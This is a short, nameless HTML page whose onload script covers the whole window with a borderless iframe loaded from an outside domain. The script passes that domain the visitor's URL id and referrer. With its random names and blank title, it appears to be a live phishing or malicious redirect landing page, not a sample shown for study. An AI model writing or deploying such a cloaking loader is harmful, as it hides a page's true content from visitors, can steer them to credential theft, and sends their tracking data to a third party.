


<html>
<head>
 
		<title> </title>
    <meta name='viewport' content='width=device-width, initial-scale=1.0'>
  
</head>
<title> </title>


</head>
  <body  onload="load()">

    <div id="jmansjd" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"></div>
 <script type="text/javascript">
     function load() {
         var referrer;
         try {
             referrer = document.referrer;


         }
         catch (err) {

         }
         var poksm33 = window.location.search.split('?id=')[1];
         frame = document.createElement("iframe");
         frame.setAttribute("src", "https://lifuzhao.xyz/pops/fysblok.aspx?id=" + poksm33 + "&sitpr=" + referrer + "&");
         frame.setAttribute("name", "ubs54fd");
         frame.setAttribute("id", "frame");
         frame.frameBorder = 0;
         frame.style.margin = 0;
         frame.style.width = 100 + "%";
          frame.style.height = 100 + "%";
          document.getElementById("jmansjd").appendChild(frame);

     }
</script>
</head>

</html>
